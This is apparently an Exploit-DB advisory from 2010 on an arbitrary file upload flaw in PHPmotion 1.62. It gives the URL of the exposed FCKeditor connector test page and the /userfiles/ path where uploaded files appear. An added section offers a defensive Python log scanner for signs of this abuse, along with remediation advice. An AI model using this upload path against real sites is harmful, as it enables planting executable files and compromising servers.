PHPmotion 1.62 - 'FCKeditor' Arbitrary File Upload

EDB-ID: 15602
CVE: N/A
Author: trycyber
Type: webapps
Platform: PHP
Published: 2010-11-23

-----------------------------------------------------------------------
phpmotion/FCKeditor  File upload vulnerabilities
-----------------------------------------------------------------------
Author		: trycyber (trycyber@magelangcyber.com)
Homepage	: http://indonesiancoder.com,magelangcyber.web.id
Vendor		: http://www.phpmotion.com/
Dork		: CIHUY ;p
Version     	: 1.62
Tested on	: Win Xp sp2	
Date		: November 23, 2010
-----------------------------------------------------------------------

I.  POC & Exploit
-----------------------------------------------------------------------
Default 	:	http://127.0.0.1/


exploit 	:	http://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
			

results in	:	http://127.0.0.1/userfiles/name of file	 
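
Added example, not part of the original advisory: a log check a site owner could run to see whether the FCKeditor connector directory named above is being served and whether script files are being fetched from /userfiles/. The log lines are constructed, and the combined log format and the extension list are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Directory prefix of the advisory URL; /userfiles/ is the upload location it names.
CONNECTOR_DIR = "/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/userfiles/"
# Assumption: extensions a PHP host is commonly configured to execute.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

# Assumption: Apache/nginx combined log format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample access-log lines (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [23/Nov/2010:10:00:01 +0000] "GET /phpmotion/fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 5120
198.51.100.7 - - [23/Nov/2010:10:00:09 +0000] "GET /userfiles/notes.php HTTP/1.1" 200 312
203.0.113.9 - - [23/Nov/2010:10:02:11 +0000] "GET /userfiles/holiday.jpg HTTP/1.1" 200 48211
203.0.113.9 - - [23/Nov/2010:10:03:40 +0000] "GET /phpmotion/FCKeditor/editor/filemanager/connectors/test.html HTTP/1.1" 404 210
192.0.2.44 - - [23/Nov/2010:10:05:00 +0000] "GET /userfiles/img%2Ephp?x=1 HTTP/1.1" 200 90
"""

def scan(log_text):
    """Return (ip, rule, path) findings, in log order."""
    touched = set()   # clients that were served something from the connector directory
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        # Drop the query string, decode %-escapes, fold case before matching.
        path = unquote(urlsplit(target).path).lower()
        ok = status.startswith("2")
        if CONNECTOR_DIR in path and ok:
            touched.add(ip)
            findings.append((ip, "connector-page-served", path))
        elif UPLOAD_DIR in path and path.endswith(SCRIPT_EXT) and ok:
            rule = "script-in-userfiles-after-connector" if ip in touched else "script-in-userfiles"
            findings.append((ip, rule, path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

Any "connector-page-served" hit means the editor's file manager connectors are reachable from the web and should be removed or access-restricted; script hits under /userfiles/ mean that directory should not be allowed to execute uploaded files.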


------------------------------------------------------------------------
Credits
------------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~  Mboys ~ Contrex ~  n4KuLa_
k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader

-------------------------------------------------------------------------
"I learn not because of you, but because I want to become myself"

Indonesiancoder family & Magelangcyber family